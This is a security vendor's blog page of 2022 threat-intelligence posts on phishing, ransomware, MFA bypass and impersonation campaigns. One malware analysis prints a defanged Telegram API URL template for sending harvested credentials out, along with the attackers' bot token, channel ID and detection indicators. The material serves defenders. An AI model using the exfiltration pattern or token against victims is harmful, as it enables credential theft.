Request a Demo of Tessian Today.

Automatically stop data breaches and security threats caused by employees on email. Powered by machine learning, Tessian detects anomalies in real-time, integrating seamlessly with your email environment within minutes and starting protection in a day. Provides you with unparalleled visibility into human security risks to remediate threats and ensure compliance.

Feb 16 Live Webinar | Code42 & Tessian Present: Insider Risk Trailblazer – Security Burnout | Register Today →

Threat Intel
2022 Tessian Threat Intel Roundup: Social Engineering Threats Are Here to Stay
by John Filitz Thursday, December 8th, 2022
As we close out the year, one thing is certain: Social engineering attacks will remain a mainstay for threat actors. The ease with which threat actors are able to exploit human vulnerabilities will find even the most secure organizations wanting. This is why according to Tessian’s inaugural State of Email Security Report (2022), impersonation attacks are the number 1 concern for organizations globally. Only by adopting a defense-in-depth strategy will organizations be able to reduce the risk of falling victim to social engineering-based attacks.    In this final newsletter for the year we take a look at some of the dominant themes we’ve covered in 2022.   Sign-up for our Threat Intel update to get this monthly update straight to your inbox.   
Top Threat Intel Themes Covered in 2022 1. Phishing-as-a-Service Goes Mainstream Phishing remains a persistent threat and security challenge.  Phishing-as-a-Service offerings continue to evolve and proliferate on the dark web, reducing barriers to entry and effectively creating whole new armies of threat actors. Threat actors continue having significant success using phishing and business email compromise campaigns (BEC) to compromise organizations.  This helps explain why social engineering attacks in the form of phishing and BEC are the top two costliest forms of a breach, topping out at $4.91 and $4.89 million, respectively.    2. Impersonation campaigns continue evolving Earlier in the year we started tracking an increase in 3rd party impersonation campaigns that were leveraging PayPal to carry out invoice fraud.  Other impersonation campaigns that came across the wire included threat actors targeting the legal sector – a sector that is disproportionately targeted by social engineering attacks. We’ve also found that obfuscation is the name of the game for malicious payload delivery. The continued persistence of brand impersonation campaigns is also cause for concern. In fact, the FTC reported a sharp increase in impersonation fraud, with losses totaling $2 billion in the period October 2020 to September 2021.  We expect these trends to continue, evidenced by record breaking phishing activity in 2022, for the first time surpassing 1 million phishing attacks reported in a quarter.    3. The Unrelenting Scourge of Ransomware  One of the recurring themes we have been tracking is the nexus between ransomware and spear phishing attacks.  Ransomware has proven to be a persistent security challenge with the rise of Ransomware-as-a-Service (RaaS) offerings. The increase in ransomware related damages – seeing a 57x increase from 2015 – is one of the main reasons driving up cyber insurance premiums, seeing increases of over 100% in the past 18 months. We expect nation-state and non-aligned threat actors to continue relying on ransomware and related extortion tactics, with email a key threat vector for payload delivery.   4. The rise, and rise, of credential compromises Another trend we have been closely following is the increasing prevalence of credential related compromises. One such noteworthy adversary-in-the-middle (AiTM) compromise saw 10,000 organizations that use Microsoft targeted.   Several large organizations have suffered credential related compromises, shining a spotlight on the fallibility of identity and access management (IAM) solutions in relation to the threat that social engineering poses. Credential compromise social engineering campaigns that target organizations using  Microsoft 365 and Google Workspace collaboration software, will remain a core focus area for threat actors going forward.   5. Event opportunism As so often is the case, cyber criminals, the opportunists that they are, will attempt to exploit international and national events, including acts of war, pandemics and festive events. This reality was on full display at the start of the Russian invasion of Ukraine. We noted that over 70% of newly registered Ukraine themed domains were likely to be malicious. We expected a ramp-up of Russian cyber campaign activity in the wake of the Russian invasion of Ukraine, however this has failed to materialize.  Effective public-private partnerships as demonstrated by Microsoft and others are part of the reason for the unprecedented level of cyber resilience by Ukraine and allied countries.   
Concluding Thoughts & Recommended Actions   Only by adopting a multi-pronged, defense-in-depth security strategy will the risk of social-engineering-related breaches be reduced. Utilizing best-in-breed cybersecurity solutions that have behavioral intelligence-based defensive capabilities, and that reinforce security culture strengthening like Tessian, is increasingly essential to address an ever-evolving social engineering threatscape.    Until next year, stay safe and stay secure.
To see how Tessian prevents ransomware attacks, and protects against DLP, watch a product overview video or book a demo.   For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn
Read Blog Post
Threat Intel
“No Pain No Gain” Impersonation Campaign – Sending Stolen Credentials to Telegram Group
by Catalin Giana Thursday, November 10th, 2022
The Tessian Threat Intel team discovered a new Microsoft impersonation campaign in the wild called “No Pain No Gain.” The campaign utilizes a Telegram API call to harvest credentials to a malicious chat group on the messaging platform – a common tactic that was first identified last year. The threat actors also relied on heavily encoding the malicious attachment.  Read further to see how we reviewed the attachment, and the steps we took to de-obfuscate it. We also show what the harvested credentials look like when received by the Telegram BOT API. The victim receives an email with an HTML attachment called Setup Outlook-mail.html. Upon opening it you are redirected to a page that impersonates Microsoft’s login, with the victim’s email address already embedded in the page. Impersonated Microsoft login page
Although this is not impressive at this point. At face value it appears to be a run-of-the-mill impersonation campaign that has been seen before. Where it gets interesting is that upon inspecting the HTML page it is apparent that great effort was taken to obfuscate the code. Decoding the HTML attachment Obfuscated code
Step 1 The HTML page contains multiple layers of obfuscation that needed to be removed manually in order to reveal the original content. After escaping all the javascript-encoded characters we were left with a more readable script. Code snippet before base64 decoding Step 2 In order to reveal the actual HTML script we had to decode the string found in the data variable which we found out was base64 encoded. After another step of decoding and beautifying, we found the readable HTML code. Decoded data variable Outcome All the magic can be found in the code snippet above. What is unique about this campaign is the fact that instead of using a command and control server to store the stolen data, it is using the Telegram app, via the Telegram API to a malicious chat group on the messaging platform. The stolen information contains usernames and passwords that can be used to compromise Microsoft email accounts. The sent message also has the geolocation of the victim and the User-Agent that was used.
Telegram testing with our own channel We created a Telegram chat group for testing purposes to see exactly how the stolen data i.e. the credentials are harvested and sent out via the Telegram API (see graphic below). Using an impersonated Microsoft login-in page, the threat actors prompt the victim for a password, this triggers a pop-up message indicating that the first password entered is incorrect or too short. The victim is then prompted to submit a second password, which then appears to be a successful log-in.  In addition to harvesting the credentials, other collected data includes the victim’s IP address by using the ip-api.com service. All the stolen data is stored in the malicious Telegram chat group in the format below. Example of harvested credentials message  
When we use the getChat endpoint, we received the response below from the malicious Telegram group chat. We were able to identify the group ID, the group name and determine that the channel is private. Group ID   We were also able to determine that the malicious Telegram group chat has two members. Group Members   After further investigation we were unable to access the contents of the Telegram chat group due to privacy and security settings set by the threat actors. We based this determination on the fact that the value of the parameter “can_read_all_group_messages” is set to “False”. Privacy Settings
Indicators Here is a table of indicators that can be filtered or searched on in your logs for any potential past leaks, or signals for any attempts. Object Indicator Telegram Bot ID 5695672431:AAF0Bzm_wh3g13sO-CDFeWWC-k6kWv7-Emk Telegram Channel ID 5748272550 Email Attachment Filename [T1598.002] Setup Outlook-mail.htm Setup Outlook-mail.html Starting Text <script>var emai\u006c=” Telegram API Exfiltration [T1071.001] https://api[.]telegram[.]org/bot$botid_value/sendMessage?chat_id=$channel&text=$credentials $botid_value = the value that Telegram BotFather provides for the bot 5695672431:AAF0Bzm_wh3g13sO-CDFeWWC-k6kWv7-Emk $channel = the value of the channel at Telegram 5748272550 $credentials = The data that is being sent to Telegram and the fraud channel hosted there  
Conclusions and Recommendations  Don’t open attachments from unknown sources, especially if you weren’t expecting an Invoice/Outlook Setup/Resume etc. If you opened an attachment and you are still unsure please send it to your security team for review. Ensure that your organization utilizes an intelligent email security solution that can prevent and detect advanced impersonation campaigns. If you have security experience, you can open the HTML page in a text editor before running it, if it’s highly obfuscated as in the first screenshot above there is a high possibility that it’s likely to be malicious.  Additionally the US Cybersecurity and Infrastructure Security Agency (CISA) offers useful advice for staying safe as well as a list of free cybersecurity tools: The UK’s National Cyber Security Centre (NCSC) also has offers useful guidance for staying safe:
Read Blog Post
Threat Intel, ATO/BEC
Tessian Threat Intel Roundup: Advanced Phishing Attacks
by John Filitz Monday, October 31st, 2022
On the back of Cybersecurity Awareness Month in October 2022 with key recommendations to protect against phishing attacks, we delve deeper into the latest Phishing-as-a-Service offering known as Caffeine, first identified by Mandiant. We also unpack an impersonation campaign we identified in the wild called Logokit. And in other notable news, a misconfigured Microsoft endpoint storage vulnerability dubbed BlueBleed was exposed by researchers at SOCRadar, potentially exposing sensitive data for thousands of customers. Sign-up for our Threat Intel update to get this monthly update straight to your inbox.     • Phishing-as-a-Service (PhaaS) is now sold alongside Ransomware-as-a-Service (RaaS) on the dark web.  • The commercialization of these PhaaS exploit kits and threat actors’ services are removing the barriers to entry for carrying out attacks, at scale.  • The most recent offering is the so-called Caffeine PhaaS exploit kit that enables anyone to procure the kit and launch phishing attacks against Microsoft 365 targets.  • Tessian Threat Intel recently identified a Business Email Compromise (BEC) campaign in the wild called Logokit. • Logokit uses randomized spoofed pages and brand logos for purposes of harvesting login credentials. In one instance we found that a spoofed version of a Microsoft login page was being used in an attempt to capture credentials. • Researchers from SOCRadar identified six misconfigured Azure buckets which it has dubbed BlueBleed. • The BlueBleed exposure according to SocRadar is among the most significant B2B leaks ever, exposing sensitive data of 65,000 entities across 111 countries.  • Microsoft immediately rectified the privacy settings on the exposed buckets, thanking SOCRadar, however disputing the extent of the exposure.
Phishing remains a persistent threat and security challenge. Threat actors continue having significant success using social engineering attacks to compromise organizations. And there is no silver bullet to protect against social engineering attacks.    Only by adopting a multi-pronged, defense-in-depth security strategy will the risk of a social-engineering-related breach be reduced. Utilizing a best-in-breed solution that has advanced social engineering defense capabilities and that reinforces security culture strengthening like Tessian is increasingly essential to address an ever-evolving threatsc
To see how Tessian prevents ransomware attacks, and protects against DLP, watch a product overview video or book a demo. For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn
Read Blog Post
Threat Intel
A day in the life of Tessian’s Threat Hunters
by Andrew Webb Thursday, October 13th, 2022
Our head of Threat Intelligence, Paul Laudanski, takes us through a typical threat hunting exercise and takes up the story… Threat hunting is the act of looking for the unknown; for an attack vector we don’t know anything about, for a new campaign, or changes to tactics, techniques and procedures. And there are always new types of attacks to contend with. When I find one type of threat, oftentimes that can snowball into finding other types of threats, so I keep hunting and pivoting and enriching the information that I find. Here’s a recent example…   At Tessian, we’re interested in attacks delivered via email and so I started off with a query looking for URL duplicates that have been sent in emails at least five times during September. I’m specifically targeting the “low and slow” type of attack, where the offenders do not want to alarm security tools and teams. They might be targeting a certain type of function or role for instance. 
Breaking this SQL query down, I search for URLs and the email subjects they are associated with, and how many times they were seen. I don’t want to see singletons but my gut tells me I don’t want to see anything less than 3 hits. Will I search for those as well? Yes, that is another type of search I run in another stream. But for now, my interest is in 5 or more hits. This approach revealed some interesting recurring URL path and filename values. This match, k7OIMyJhEU/page1.php  after the domain, was seen hundreds of times across many domains and their subdomains. Very much a low type of attack because it was spread across different domains. Tools don’t normally pick up on this type of occurrence, and it takes an intel analyst to find such behavior There were several full URLs with that exact pattern, and as I sampled some, Chrome was telling me they were bad. But I couldn’t get the ones I was sampling to actually load anything. So I updated my query to this:
This query now focuses on giving me all the URLs that match that directory pattern, because I want to see what this actually is. Here is a sample, with a subject containing Visa or Mastercard in it. We know from Chrome that some of these that I sampled are malicious.
The subject is detected by Google Translate as Japanese. Taking a sample subject from the above, I’m advised it translates to: “Visa card information on estimated payment amount”. Now I continue to pivot, and take a domain for further analysis: anl7ya[.]icu.   An open source investigation into said domain showed it is heavily involved in phishing and malware activity. Researching Passive DNS data for that domain, there are 191 records. Many of the subdomains were first seen on the 14th of September. None of this is good based on the threat signals around the domain and its activity.   The IP address associated with the domain, searching spam deny listed services reveals UCEPROTECT and Barracuda have it listed as being involved in spam campaigns.
So I started off with JST with an open mind and a theory, hunting and pivoting, trying to see what I could find. I found something for sure, and then started to enrich and dive deeper and go broader. Doing so gave me a lot more information we can use to build our own threat intel. This is called derivative data, and it helps to spot the attacks on a broader scale, otherwise we might miss additional attack vectors   Ultimately, in my open source queries I found a snapshot reported by a Twitter user:  
As a threat intelligence team, we work hard to ensure customers are protected against this and other types of behavior by leaning in and being engaged with the intelligence. We want to focus on what is called the Pyramid of Pain. Here we have indicators we can use to detect and protect against, and we can also move up the pyramid and look at the patterns, in this case, it doesn’t matter what the domain is, so long as we see “k7OIMyJhEU/page1.php”, we can detect it and look to protect against it. Hence our coverage is broad, and we add another query into our playbook that we can automate and spot any changes or new patterns of threats.   This is fun and exciting work, I enjoy working with the unknown and making actionable sense of intelligence. If you’d like to join me, check out our open roles here. 
Read Blog Post
Threat Intel
New Impersonation Campaign: Logokit
by Catalin Giana Friday, September 30th, 2022
In August Tessian’s Threat Intel team saw a new Business Email Compromise malware campaign in the wild called Logokit. Logokit is an impersonation attack phishing kit used to propagate Business Email Compromise campaigns to harvest credentials.   How Logokit exploit kits work    Threat actors will impersonate domains of trusted brands, commonly seen impersonating healthcare, financial or legal services providers. The phishing email usually contains a malicious URL or attachment.    The unsuspecting victim will click on the malicious URL which in this case redirects to an impersonated website of Microsoft. There, the threat actors attempt to harvest login credentials.    
The attack chain   1: The law firm is impersonated and a spoofed account is used to send a malicious email to the victim. 2: The victim receives the malicious email and downloads the malicious HTML attachment.  3: Upon execution of the HTML page, the final landing page is Microsoft impersonation page, requesting the victim to enter Microsoft login credentials.  4: The compromised credentials that were inserted by the victim are then harvested by the threat actor.   Threat analysis In the case that Tessian Threat Intel analyzed, a victim of this campaign was targeted by threat actors impersonating a law firm. The impersonated email from the law firm contained the company logo, as well as an obfuscated HTML attachment titled: Letter To Buyer’s Solicitor Enclosing Contract Bundle.htm
Tessian Threat Intel started the investigation in a virtual environment, analyzing the attached HTML file. At first inspection the HTML file appeared benign. We, then, analyzed the HTML file in a non-virtual environment. This initial HTML file then redirects to an impersonated Microsoft login webpage.   Conclusion and recommendations for staying safe   At the initial time of analysis, the Logokit redirect campaign stopped at the Microsoft phishing landing page. There is a high probability that this campaign could be altered in the coming days and weeks, landing on a different page.   In order to not fall victim to similar types of phishing emails we recommend:   Being careful of unsolicited emails, especially those containing attachments or URLs. Before interacting with any suspicious email received, check the source and email header to confirm the organization it originated from is legitimate. If anything seems unusual, do not follow or click on links, or download attachments.  If the suspicious email appears to come from someone you know and trust, like a colleague, reach out to the individual directly by phone, Slack, or a separate email thread. Rest assured, it’s better to confirm and proceed confidently than the alternative.  Adopt intelligent cloud email security solutions like Tessian that use behavioral intelligence to detect and prevent advanced email attacks, including increasingly sophisticated impersonation emails.
Read Blog Post
Threat Intel
Tessian Threat Intel Roundup: Ransomware Dominates
by John Filitz Wednesday, September 28th, 2022
As we wind down Q3, we see no letting up by threat actors with a series of high profile breaches dominating the headlines in September. Of concern is the increasing activity of Ransomware-as-Service (RaaS) offerings and threat actor activity. It’s little surprise that phishing and email remain significant threat vectors for ransomware actors, either to gain initial access, or to execute ransomware payloads.   Sign-up for our Threat Intel update to get this monthly update straight to your inbox.    Key Takeaways Phishing attacks are in uncharted territory with over 1 million attacks reported for Q2 2022. Financial services and SaaS companies are among the most targeted. Phishing and email remain primary threat vectors for gaining initial access to carry out ransomware attacks. The Ransomware-as-a-Service (RaaS) gang activity continues its steady increase up by 63% in Q1 2022, as RaaS actors continue to diversify services and exploit kits, including mining exposed data to carry out second stage Business Email Compromise (BEC) campaigns. There is significant concern that corrupting of files will become a new modus operandi of Noberus aka BlackCat ransomware actors and affiliates over the usual encrypting of files. LockBit ransomware encryption code has been leaked, sparking concern for an increase in LockBit attacks. Ukraine has proven to be cyber resilient against Russian cyber attacks, largely as a result of recovering from previous significant breaches such as NotPetya, as a result of NATO support. Recent reports of an Iranian cyber campaign against Albania has resulted in the severing of diplomatic ties with Iran. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued a record number of advisories for the month, with ransomware and nation-state activity from Iran being front-and-center.
Trending Analysis Phishing attacks continue the upward trajectory according to the latest from APWG’s Q2 Phishing Activity Trends Report – with over 1 million phishing attacks recorded for the 2nd quarter of 2022 – the worst quarter on record. The most targeted industries according to APWG include financial services (28%), followed by webmail and Software-as-Service providers (19%) and retail (15%). Some of the key threat vectors identified by APWG are email delivered impersonation and ransomware attacks. New Zealand’s Computer Emergency Response Team (CERT NZ) agency reports that phishing campaigns are the primary method for threat actors to gain initial access to carry out ransomware attacks. Email according to CERT NZ, is the third most commonly used vector for malware delivery.  Trend Micro reports a 63% rise in Ransomware-as-a-Service (RaaS) groups in the first quarter of 2022.  Accenture reports on a growing trend of threat actors leveraging “sensitive corporate data exposed on the dark web” to carry out sophisticated Business Email Compromise (BEC) campaigns. Findings from a Stairwell study indicate that RaaS Affiliates of Noberus also known as BlackCat/ALPHV, the successor to DarkSide and BlackMatter ransomware gangs, is potentially resorting to corrupting files on local systems instead of encrypting them with the release of a new “Exmatter” tool. BleepingComputer citing research from Symantec on the “Exmatter” tool, shows that the new data extraction tool has been reengineered to more stealthy gain a foothold and exfiltrate data from compromised systems – an essential complement for carrying out double-extortion attacks. Symantec researchers also confirm the ability of Exmatter to “corrupt processed files.” The Record reports that leaked LockBit ransomware code has the ability to enable more widespread use of the ransomware file encryptor.  The U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI) and Multi-State Information Sharing and Analysis Center (MS-ISAC) issued a joint advisory on Vice Society ransomware actors that are targeting the education sector.  The Los Angeles Unified School District, the second largest school district in the country,  was the latest victim to suffer a Vice Society ransomware attack that resulted in the loss of access to 500GB of data. CISA and MS-ISAC also released a ransomware guide, and CISA issued a RFI for new cybersecurity incident reporting for the proposed Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA). The proposed cyber compliance requirements will compel companies to report significant cybersecurity incidents within 72 hours, and 24 hours after a ransomware payment has been made.  Turning attention to nation-states, Ukraine has proven to be relatively cyber resilient in the ongoing conflict with Russia in a large part due to recovery from previous cyber attacks such as the infamous NotPetay attack in 2017. The significant support received from NATO is also another decisive factor. It is suspected that Ukranian affiliated cyber actors hacked Russia’s Wagner Group, responsible for mercenary recruitment for the Russian armed forces – compromising the personal data of mercenaries. CISA shows that Iranian nation-state actors gained access to the Government of Albania’s network 14 months prior to launching a devastating ransomware and wiper malware attack on that country in July. Albania has since severed diplomatic relations with Iran as it tries to recover data and restore public service operations.
Concluding Thoughts & Recommended Actions   The data point to an increasing threat of ransomware-related breaches in the short-to-medium term. Key industry verticals receive a disproportionate amount of attacks including financial services, technology, and more recently the education sector. The threat of nation-state-sponsored attacks as witnessed recently in Albania is of growing concern. Increasing geopolitical tension and instability are likely to exacerbate the probability of state-sponsored ransomware campaigns disrupting key public services.   As the ransomware threat grows, adopting a defense-in-depth strategy is essential. One key attribute of hardening your information system against ransomware attacks is leveraging a machine learning, behavioral-based cybersecurity solution like Tessian that can detect anomalous behavior on email as it arises.   
To see how Tessian prevents ransomware attacks, and protects against DLP, watch a product overview video or book a demo.   For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn
Read Blog Post
Threat Intel
Tessian Threat Intel
by John Filitz Tuesday, August 30th, 2022
A growing incidence of multi factor authentication (MFA) compromises is dominating the threatscape.    The recent breaches at Cisco and Twilio were part of a large phishing campaign that resulted in close to 10,000 credentials at 130 organizations being compromised. Another noteworthy MFA attack was the recent adversary-in-the-middle (AiTM) compromise at Microsoft, impacting over 10,000 organizations. We’re also tracking the persistent and growing challenges posed by ransomware and nation-state campaigns.   Sign-up for our Threat Intel update to get this monthly update straight to your inbox.    
  The use of MFA is an essential security control but has been over-hyped as providing fail-safe protection.   Social engineering using phishing for credential theft is central to recent MFA compromises.   Phishing attacks are escalating month over month to record highs.   MFA bypass attacks targeting organizations that use Microsoft 365 are on the rise.   ATO attacks are increasing and disproportionately targeting the financial sector.   Ransomware attacks are increasing and are targeting the industrial sector.   The threat posed by nation-state cyber campaigns is expected to persist and increase as geopolitical tensions escalate.
  The cost of a data breach is now $4.35m per incident. For healthcare that figure rises to $10.1m.   Phishing attacks are the costliest form of a breach coming in at $4.91m.   ATO attacks have increased by 307% in the last 2 years, with ATO related losses increasing by 90% in 2021 alone.   Phishing attacks escalated to over 1 million attacks in Q1 2022 – a new record.   Credential theft campaigns that resulted in the Cisco and Twilio breaches are part of a  phishing campaign that made use of what has been dubbed the “oktapus phishing kit.” This phishing campaign netted the Okta login credentials of almost 10k users at 130 organizations – mostly located in the US. Victims were targeted with a SMS phishing campaign linked to a malicious site that captured Okta login credentials and 2FA codes. The credentials were then used to gain access to the corporate networks of the affected companies via VPNs and remote devices.   The recent Microsoft 365 MFA related compromises were, according to Microsoft, attributed to the theft of a significant amount of login-in credentials through a large-scale phishing campaign. Using the compromised credentials, threat actors were able to hijack users’ already authenticated sign-in sessions. The threat actors were then able to access victims’ mailboxes and carry-out business email compromise campaigns against other targets.    According to Mitiga, the vulnerability inherent in Microsoft’s MFA authentication protocol is at the heart of the compromise. In particular, the lack of regular re-authentication prompts for a user’s session, even when a user is provisioning applications of a sensitive security nature, such as registering a second authenticator application in their Microsoft profile, played a big role in enabling escalation of the compromise.    This weakness is further demonstrated in the Privilege Identity Management feature of Microsoft’s MFA, enabling admin users to request admin privileges through the PIM  feature only when needed. However Microsoft does not prompt users to reauthenticate for this privilege escalation on the basis that their existing session has already been authenticated. Compounding these vulnerabilities is the fact that there is no-way for customers of Microsoft 365 to override the MFA native features and request additional reauthentication prompts.   According to NCC Group, ransomware attacks are up 47% compared to a month earlier, with the top 3 targeted industry verticals industrials (32%), consumers cyclicals (17%), and technology (14%).    Lockbit 3.0 and Hiveleaks and BlackBasta are the top 3 trending ransomware groups, with Lazarus Group activity also increasing.   The threat of nation-state cyber campaigns is growing according to CSIS, with 86% of organizations indicating that they have been recently targeted on behalf of a nation-state.
  The recent MFA compromise breaches indicate the limitations of this singular security control. This is resulting in an increasing number of successful ATO attacks.    As threat actors become more sophisticated, adopting a defense-in-depth strategy is essential. One key attribute of hardening your information system against ATO attacks is leveraging machine learning powered behavioral-based cybersecurity like Tessian that is able to detect anomalous behavior as it arises. This includes once an attacker has effectively bypassed security controls such as MFA.
To see how Tessian prevents ATO attacks, and protects against DLP, watch a product overview video or book a demo.   For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn
Read Blog Post
Threat Intel
Tessian Threat Intel Roundup: July 2022
by John Filitz Friday, July 29th, 2022
Impersonation attacks are a significant contributing factor to the growing phishing challenge, with APWG reporting over 1 million phishing attacks in Q1 2022 – the highest number of attacks recorded for a quarter.   Threat actors are targeting well-known brands to carry-out sophisticated social engineering attacks and are leveraging legitimate 3rd parties to conduct their attacks. Threat actors are also using open source intelligence to impersonate and target specific individuals within companies.   Once trust has been established, the threat actor can further compromise the information system – this includes compromising vendors within the target’s supply chain – by delivering a malicious payload.   The challenge in detecting impersonation attacks is expected to become more protracted in the short term. This is due to the majority of organizations still relying on legacy rule-based email security solutions that are unable to detect sophisticated impersonation attacks.   Sign-up for our Threat Intel update to get this monthly update straight to your inbox.  
Impersonation attacks mimicking well-known and trusted brands, and will remain a mainstay for threat actors to perpetrate attack campaigns that include fraud and account compromise as key objectives.   Impersonation attacks are becoming more targeted and are leveraging open source intelligence, targeting smaller companies as well as specific individuals at those companies, with the C-suite particularly targeted.   Legitimate 3rd party services providers,  including mass-mailing services and payment providers are increasingly common methods employed by threat actors.   Account Takeover-based impersonation attacks, specifically within the supply chain ecosystem of a particular company, pose among the greatest threats. This is due to the threat actor operating within the “circle of trust” and having access to multiple targets.
The FTC has reported a sharp increase in impersonation fraud, with losses totaling $2 billion in the period October 2020 to September 2021. Some of the leading corporations are the most impersonated. In the technology space, this includes Microsoft, Google, Amazon and Apple as among among the most impersonated brands.   Email impersonation attacks come in different guises including:   Typosquatting – in this instance the threat actor sets up an email domain that appears to be legitimate – however with one or several characters replaced with look-a-like characters, for example using zero instead of “o.”   Email domain spoofing – the threat actor will manipulate the email headers so that false email address is displayed to the sender, for example the sender’s email address is “fraudster@cybercrime.com,” but the recipient sees “billgates@microsoft.com” in their inbox. Often email domain spoofing will include some degree of brand impersonation, including use of brand logos and email footers, to enhance the legitimacy of the malicious email.   Account Takeover – ATO attacks are possibly the most insidious form of impersonation attacks due to the threat actor leveraging a compromised and “trusted” email account to perpetrate an attack.   Threat actors often use a sense of urgency combined with some intelligence to get the target to carry-out their request, for example, such as requesting urgent payment of a known supplier invoice but to a bank account number controlled by the threat actor.   Malicious payloads in the form of attachments or links are also commonly used. The malicious nature of the payload is obfuscated to bypass rule-based security controls.   In the case of a malicious attachment, common obfuscation methods include changing the file name to a “.doc” or “.pdf” or in the case of a malicious link, using third-party mailing services to deliver the malicious links. This can include the use of link-redirects that will redirect the victim using a “safe” link to a safe website, which then redirects to a malicious website.   One noteworthy impersonation attack campaign included the NOBELIUM campaign detected by Microsoft Threat Intelligence. In this campaign, threat actors leveraged a legitimate mass-mailing service Constant Contact to impersonate the US International Development Aid agency (USAID) to distribute malicious URLs to a “wide variety of organizations and industry verticals.”   More recent impersonation campaigns are leveraging a combination of phishing email and a call-back number impersonating a well-known and trusted security vendor in an attempt to compromise the target via remote administration tools (RAT).
The need to upgrade email security is increasingly moving up the priority order list.   Legacy rule-based solutions are unable to detect multi-tiered impersonation attacks that remain undocumented in most threat intel engines on which legacy solutions rely.   Adaptive, machine learning powered behavioral detection is essential to detect unknown and rapidly evolving threats, including supplier based ATO attacks.   Leveraging security solutions that incorporate security awareness training as part of the active defense measures remains a key element of ensuring that end-users are in a better position to detect impersonation attacks.
To see how Tessian prevents ransomware attacks, and protects against DLP, watch a product overview video or book a demo. For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn
Read Blog Post
Threat Intel
Tessian Threat Intel Roundup for June
by Charles Brook Tuesday, July 5th, 2022
The Tessian Threat Intel team continues its focus on business email compromise (BEC) campaigns. We issued a Threat Advisory for a PayPal themed campaign we have been tracking since January.   The threat actors in this campaign are seeking to illicit payment fraud and potentially compromise credentials. Other key threats that we are focussing on include increasingly advanced methods for Account Takeover (ATO) and the persistent threat of email-delivered ransomware, including a spike of wiper-malware. Sign-up for our Threat Intel update to get this monthly update straight to your inbox.
  Tessian Threat Intelligence has recently tracked and observed scammers, on numerous occasions sending emails with fake invoice payment requests from payment service providers such as PayPal. From early evidence we are seeing, online fraud campaigns are on the rise, with the potential to evolve to ATO based attacks. Although the primary targets are private consumers, we are likely to see similar attacks targeting vendors and suppliers in the enterprise. The increasing sophistication and targeted nature of attacks observed across the cybercrime landscape represent the maturation of cyber crime, with threat actors targeting specific entities rather than random targets. A number of these phishing attacks are leveraging open source information, as well as relying on information gathered from previous data breaches to identify high yield targets.
  Tessian Threat Intel continues to track BEC and payment fraud campaigns with executive impersonation observed as a consistent theme.  Cryptocurrency payment fraud has already resulted in over $1billion in losses according to the FTC and is up 60x in 2021 compared to 2018. Ransomware-as-a-Service gang activity emanating from Russia is on the rise once again, with REvil re-emerging after an initial law enforcement crackdown. Wiper-malware is surging in 2022, first seen in Russian cyber attacks against Ukraine. Russian APT groups have been observed exploiting the Follina vulnerability.  Microsoft released a patch for Follina in June but we may see a spike in attachment-themed phishing abusing the vulnerability before the fix is widely implemented. Chinese APT groups have been using ransomware as a decoy to carry out espionage campaigns. Other attack campaigns that have captured our attention include the increasing phenomenon of voicemail themed phishing campaigns observed by Zscaler. We expect email delivered ransomware, including the growing prominence of wiper-malware to remain leading threats in 2022. A recently launched carding site ‘BidenCash’ gave away a list of stolen card details for free across darkweb forums to promote their store.
  Having intelligent and layered cybersecurity defenses in place, particularly securing email and the endpoint, are critical for staying safe. Leveraging behavioral cybersecurity solutions that can detect sophisticated social engineering attempts is essential, as threat actors continually develop intelligent methods to bypass rule-based security controls. Practicing good cybersecurity hygiene and regularly testing your security controls, including business continuity and disaster resilience capabilities, are of fundamental importance to cyber resilience. Conducting in-the-moment and contextual cybersecurity awareness training on advanced email threats for your employees should be prioritized  – end-users are your first line of defense.
To see how Tessian prevents ransomware attacks, and protects against DLP, watch a product overview video or book a demo. For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn
Read Blog Post
Threat Intel
Tessian Threat Intel Roundup for May
by John Filitz Monday, May 30th, 2022
Tessian Threat Intel focussed on crypto and payment fraud campaigns for the month of May, particularly PayPal related scams which have become increasingly sophisticated over the last several months. Most recently we have identified scams relating to fraudulent email invoices requesting payment via PayPal, with some of these scams requesting payment in Bitcoin.    Keep reading for recommendations for staying safe, and sign-up for our Threat Intel update to get this monthly update straight to your inbox. 
Social engineering remains a persistent global threat that continues to evolve to evade law enforcement and cybersecurity detection and prevention efforts.   Email-delivered crypto Business Email Compromise (BEC) campaigns are increasing in volume and sophistication.   Threat actors are targeting payment providers such as PayPal and fraudulently creating email invoices to perpetrate payment fraud.   Bitcoin is the preferred payment method due to its ability to transverse geographic borders.   In their latest annual IC3 report, the FBI notes over $43 billion has been lost globally due to BEC compromises in the past 5 years. The true figure is likely significantly higher due to unreported incidents.   The FBI notes phishing is increasing and remains the most reported cyber crime incident.   To stay safe: Never click on links from suspicious emails and be on the lookout for increasingly sophisticated BEC attempts to perpetrate invoice payment/wire fraud.
Tessian Threat Intel have noted an uptick in BEC efforts, with invoice/payment fraud the primary objective of threat actors.   We have been tracking payment provider related fraud since January 2022.   Also noteworthy is the increasing sophistication of campaigns targeting victims using a range of themes including the COVID-19 pandemic and, more recently, the conflict in Ukraine.    Over the past 30 days we are still seeing an average of 45 new Ukraine themed domains registered every day. (See April’s round up on Ukraine).   Key themes of the attacks still include crypto donation scams as well as ecommerce spam, romance scams, and loans for refugees.    The donation scams are increasing in volume and expanding in variety with themes for humanitarian aid and support for children or refugees.   As the digital payment market grows, so too will the range of attacks.   Bitcoin remains the preferred medium of payment for the BEC campaigns we have been tracking.   FBI notes a 65% increase in BEC fraud related losses globally in the period 2019 to December 2021.
Be suspicious of any invoice related request, even from a trusted party.   Always verify the authenticity of the invoice by contacting the party via an independent method, for example via telephone – and never use a telephone number provided in the suspicious email.   Report suspicious emails to your security administrator.   Use an advanced email protection solution that relies on behavioral intelligence modeling vs. a static, rule based approach to threat detection.   Report all BEC related losses to your relevant law enforcement agency – only by having an accurate picture on the extent of the crime threat, can we as a community harness the required resources to effectively deal with this challenge.
To see how Tessian prevents ransomware attacks, and protects against DLP, watch a product overview video or book a demo. For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn
Read Blog Post
Threat Intel
